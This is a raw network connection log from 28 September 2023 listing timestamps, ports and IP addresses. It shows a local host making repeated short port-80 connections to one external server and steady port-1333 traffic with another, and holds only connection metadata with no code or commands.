Sep 28, 2023 06:02:00.792531967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792557955 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792568922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792581081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792606115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792619944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792642117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792649984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792682886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792695999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792721987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792732000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792757988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792774916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792793989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792798042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792829990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792840958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792866945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792879105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792903900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792921066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792941093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792948008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.792978048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.792988062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.793015957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.793026924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.793132067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.858051062 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.859298944 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.049105883 CEST	80	49817	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.049721956 CEST	80	49818	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.049817085 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.049978971 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.050067902 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.241291046 CEST	80	49818	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.246638060 CEST	80	49818	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.250566959 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.356775045 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.357110023 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.548538923 CEST	80	49818	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.548748016 CEST	80	49820	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.548877001 CEST	49818	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.549041986 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.560230017 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.689929962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:01.690001011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:01.751091957 CEST	80	49820	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.756078005 CEST	80	49820	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:01.756318092 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.871618986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:01.872066975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:01.872807980 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:01.872982979 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.053133011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053193092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053226948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053262949 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053263903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053263903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053339958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053339958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053371906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053544998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053610086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.053705931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.053764105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.064069033 CEST	80	49820	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.064176083 CEST	49820	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.073231936 CEST	80	49821	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.073302031 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.073535919 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.234572887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234627008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234642982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234698057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.234754086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234757900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.234757900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.234771967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234807014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.234847069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.234925985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.234973907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.235054970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.235121012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.235208035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.235263109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.235358953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.235420942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:02.235548973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.235665083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.235969067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.236078024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.236231089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.236375093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.273415089 CEST	80	49821	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.275243998 CEST	80	49821	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.275315046 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.388026953 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.388430119 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.415433884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415541887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415580988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415613890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415646076 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415677071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415708065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415858984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.415934086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416009903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416114092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416209936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416326046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416522026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416656017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416842937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416930914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.416963100 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.460510969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.585412979 CEST	80	49823	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.585824966 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.588038921 CEST	80	49821	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.588118076 CEST	49821	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.588279009 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.784770012 CEST	80	49823	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.786328077 CEST	80	49823	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:02.786688089 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.887849092 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.888180971 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:02.990562916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:02.990653992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:03.084377050 CEST	80	49824	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.084475040 CEST	80	49823	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.084639072 CEST	49823	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.084903002 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.084903955 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.281151056 CEST	80	49824	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.285926104 CEST	80	49824	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.286017895 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.387789965 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.388212919 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.572628021 CEST	80	49826	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.572774887 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.573018074 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.584872007 CEST	80	49824	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.584916115 CEST	49824	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.756994009 CEST	80	49826	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.761718035 CEST	80	49826	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:03.761899948 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.872407913 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:03.872811079 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.056729078 CEST	80	49826	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.057076931 CEST	49826	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.067792892 CEST	80	49827	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.067959070 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.068177938 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.263102055 CEST	80	49827	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.268066883 CEST	80	49827	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.268315077 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.376013041 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.376434088 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.570997953 CEST	80	49827	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.571058035 CEST	49827	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.573440075 CEST	80	49828	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.573523045 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.573767900 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.771488905 CEST	80	49828	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.776120901 CEST	80	49828	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:04.776396036 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.887734890 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:04.888120890 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.072400093 CEST	80	49830	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.072705030 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.072740078 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.084959030 CEST	80	49828	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.085144997 CEST	49828	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.257531881 CEST	80	49830	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.261955023 CEST	80	49830	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.262156010 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.372189045 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.372772932 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.556664944 CEST	80	49830	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.556952953 CEST	80	49831	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.556972027 CEST	49830	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.557133913 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.557377100 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.741947889 CEST	80	49831	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.744390011 CEST	80	49831	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:05.744554996 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.856703997 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:05.857199907 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.040851116 CEST	80	49831	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.040934086 CEST	49831	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.053905964 CEST	80	49834	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.054174900 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.054275036 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.252863884 CEST	80	49834	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.256072998 CEST	80	49834	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.256304979 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.488720894 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.489222050 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.685391903 CEST	80	49834	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.685475111 CEST	49834	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.685911894 CEST	80	49835	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.685997963 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.686258078 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:06.883407116 CEST	80	49835	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.885348082 CEST	80	49835	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:06.885435104 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.171386957 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:02:07.171673059 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:02:07.294076920 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.294634104 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.482317924 CEST	80	49837	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.482521057 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.482656002 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.491332054 CEST	80	49835	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.491547108 CEST	49835	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.670169115 CEST	80	49837	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.675833941 CEST	80	49837	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.675991058 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.782052994 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.784208059 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.969994068 CEST	80	49837	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.970278978 CEST	49837	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.980014086 CEST	80	49838	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:07.980115891 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:07.980479956 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.176578045 CEST	80	49838	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.182619095 CEST	80	49838	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.182807922 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.257177114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:08.294032097 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.294538975 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.479084969 CEST	80	49839	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.479470015 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.479554892 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.490184069 CEST	80	49838	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.490276098 CEST	49838	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.665215015 CEST	80	49839	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.670905113 CEST	80	49839	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.670958996 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.778557062 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.778692007 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.963809013 CEST	80	49839	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.964032888 CEST	49839	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.972728968 CEST	80	49841	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:08.973289967 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:08.973584890 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.168091059 CEST	80	49841	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.172255993 CEST	80	49841	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.172466993 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.278770924 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.279145956 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.463526964 CEST	80	49842	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.463743925 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.463850975 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.472695112 CEST	80	49841	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.472883940 CEST	49841	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.648173094 CEST	80	49842	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.652694941 CEST	80	49842	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.652887106 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.764944077 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.765435934 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.949563026 CEST	80	49842	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.949721098 CEST	49842	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.953526020 CEST	80	49843	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:09.953720093 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:09.953857899 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.142121077 CEST	80	49843	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.146848917 CEST	80	49843	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.147133112 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.263005972 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.263422966 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.451694012 CEST	80	49843	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.451929092 CEST	49843	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.464375973 CEST	80	49845	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.464448929 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.464689016 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.665671110 CEST	80	49845	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.671082973 CEST	80	49845	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.671165943 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.778669119 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.779057980 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.972546101 CEST	80	49846	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.972748041 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.973098040 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:10.979494095 CEST	80	49845	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:10.979572058 CEST	49845	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.166471004 CEST	80	49846	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.171799898 CEST	80	49846	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.171885967 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.278666019 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.279201984 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.472213984 CEST	80	49846	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.472551107 CEST	49846	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.475924015 CEST	80	49847	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.476124048 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.476481915 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.672826052 CEST	80	49847	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.677721977 CEST	80	49847	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.677916050 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.794151068 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.794455051 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.982727051 CEST	80	49851	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.982979059 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.983122110 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:11.990936995 CEST	80	49847	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:11.991127968 CEST	49847	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.171365976 CEST	80	49851	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.177068949 CEST	80	49851	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.177149057 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.279375076 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.279838085 CEST	49852	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.467046022 CEST	80	49851	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.467135906 CEST	49851	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.479490995 CEST	80	49852	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.479595900 CEST	49852	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.479801893 CEST	49852	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.679235935 CEST	80	49852	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.685281992 CEST	80	49852	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.685359001 CEST	49852	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.795694113 CEST	49852	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.796194077 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.990483999 CEST	80	49854	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.990633965 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.990849018 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:12.995349884 CEST	80	49852	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:12.995449066 CEST	49852	80	192.168.2.3	95.141.41.12
